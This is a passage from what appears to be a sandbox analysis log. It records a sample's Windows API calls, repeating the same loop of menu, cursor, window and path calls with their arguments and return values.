param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.713] GetStockObject (i=6) returned 0x1b00018 [0027.713] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.713] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.713] PathFileExistsW (pszPath=0x0) returned 0 [0027.713] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.713] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.713] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.713] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.713] GetMenu (hWnd=0x0) returned 0x0 [0027.713] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.713] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.713] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.713] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.713] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.713] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.714] GetStockObject (i=6) returned 0x1b00018 [0027.714] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.714] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.714] PathFileExistsW (pszPath=0x0) returned 0 [0027.714] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.714] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.714] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.714] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.714] GetMenu (hWnd=0x0) returned 0x0 [0027.714] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xc) returned -1 [0027.714] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.714] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.714] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.714] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.714] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.714] GetStockObject (i=6) returned 0x1b00018 [0027.714] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.714] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.714] PathFileExistsW (pszPath=0x0) returned 0 [0027.714] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.714] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.714] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.714] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.714] GetMenu (hWnd=0x0) returned 0x0 [0027.715] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.715] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.715] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.715] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.715] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.715] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.715] GetStockObject (i=6) returned 0x1b00018 [0027.715] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.715] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.715] PathFileExistsW (pszPath=0x0) returned 0 [0027.715] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.715] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.715] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.715] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.715] GetMenu (hWnd=0x0) returned 0x0 [0027.715] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.715] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.715] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.715] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.715] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.715] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.715] GetStockObject (i=6) returned 0x1b00018 [0027.715] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.715] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.715] PathFileExistsW (pszPath=0x0) returned 0 [0027.715] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.715] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.715] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.715] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.715] GetMenu (hWnd=0x0) returned 0x0 [0027.715] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.715] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.715] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.716] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.716] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.716] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.716] GetStockObject (i=6) returned 0x1b00018 [0027.716] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.716] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.716] PathFileExistsW (pszPath=0x0) returned 0 [0027.716] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.716] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.716] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.716] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.716] GetMenu (hWnd=0x0) returned 0x0 [0027.716] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.716] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.716] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.716] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.716] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.716] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.716] GetStockObject (i=6) returned 0x1b00018 [0027.716] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.716] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.716] PathFileExistsW (pszPath=0x0) returned 0 [0027.716] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.716] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.716] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.716] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.716] GetMenu (hWnd=0x0) returned 0x0 [0027.716] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x2ac) returned -1 [0027.716] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.716] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.716] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.716] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.716] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.717] GetStockObject (i=6) returned 0x1b00018 [0027.717] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.717] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.717] PathFileExistsW (pszPath=0x0) returned 0 [0027.717] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.717] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.717] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.717] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.717] GetMenu (hWnd=0x0) returned 0x0 [0027.717] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.717] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.717] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.717] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.717] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.717] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.717] GetStockObject (i=6) returned 0x1b00018 [0027.717] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.717] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.717] PathFileExistsW (pszPath=0x0) returned 0 [0027.717] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.717] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.717] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.717] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.717] GetMenu (hWnd=0x0) returned 0x0 [0027.717] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.717] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.717] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.717] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.717] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.717] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.717] GetStockObject (i=6) returned 0x1b00018 [0027.717] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.717] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.718] PathFileExistsW (pszPath=0x0) returned 0 [0027.718] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.718] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.718] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.718] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.718] GetMenu (hWnd=0x0) returned 0x0 [0027.718] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.718] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.718] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.718] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.718] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.718] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.718] GetStockObject (i=6) returned 0x1b00018 [0027.718] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.718] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.718] PathFileExistsW (pszPath=0x0) returned 0 [0027.718] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.718] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.718] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.718] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.718] GetMenu (hWnd=0x0) returned 0x0 [0027.718] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.718] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.718] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.718] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.718] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.718] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.718] GetStockObject (i=6) returned 0x1b00018 [0027.718] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.718] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.718] PathFileExistsW (pszPath=0x0) returned 0 [0027.718] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.718] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.718] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.719] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.719] GetMenu (hWnd=0x0) returned 0x0 [0027.719] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x140) returned -1 [0027.719] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.719] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.719] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.719] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.719] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.719] GetStockObject (i=6) returned 0x1b00018 [0027.719] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.719] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.719] PathFileExistsW (pszPath=0x0) returned 0 [0027.719] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.719] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.719] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.719] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.719] GetMenu (hWnd=0x0) returned 0x0 [0027.719] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.719] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.719] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.719] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.719] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.719] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.719] GetStockObject (i=6) returned 0x1b00018 [0027.719] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.719] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.719] PathFileExistsW (pszPath=0x0) returned 0 [0027.719] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.719] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.719] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.719] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.719] GetMenu (hWnd=0x0) returned 0x0 [0027.719] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.719] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.719] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.720] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.720] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.720] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.720] GetStockObject (i=6) returned 0x1b00018 [0027.720] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.720] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.720] PathFileExistsW (pszPath=0x0) returned 0 [0027.720] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.720] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.720] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.720] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.720] GetMenu (hWnd=0x0) returned 0x0 [0027.720] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.720] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.720] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.720] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.720] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.720] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.720] GetStockObject (i=6) returned 0x1b00018 [0027.720] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.720] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.720] PathFileExistsW (pszPath=0x0) returned 0 [0027.720] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.720] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.720] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.720] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.720] GetMenu (hWnd=0x0) returned 0x0 [0027.720] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.720] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.720] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.720] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.720] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.720] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.721] GetStockObject (i=6) returned 0x1b00018 [0027.721] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.721] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.721] PathFileExistsW (pszPath=0x0) returned 0 [0027.721] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.721] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.721] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.721] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.721] GetMenu (hWnd=0x0) returned 0x0 [0027.721] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4b) returned -1 [0027.721] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.721] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.721] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.721] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.721] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.721] GetStockObject (i=6) returned 0x1b00018 [0027.721] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.721] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.721] PathFileExistsW (pszPath=0x0) returned 0 [0027.721] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.721] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.721] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.721] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.721] GetMenu (hWnd=0x0) returned 0x0 [0027.721] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.721] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.721] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.721] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.721] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.721] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.721] GetStockObject (i=6) returned 0x1b00018 [0027.721] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.721] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.722] PathFileExistsW (pszPath=0x0) returned 0 [0027.722] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.722] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.722] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.722] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.722] GetMenu (hWnd=0x0) returned 0x0 [0027.722] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.722] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.722] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.722] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.722] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.722] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.722] GetStockObject (i=6) returned 0x1b00018 [0027.722] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.722] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.722] PathFileExistsW (pszPath=0x0) returned 0 [0027.722] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.722] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.722] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.722] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.722] GetMenu (hWnd=0x0) returned 0x0 [0027.722] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.722] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.722] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.722] GetSubMenu 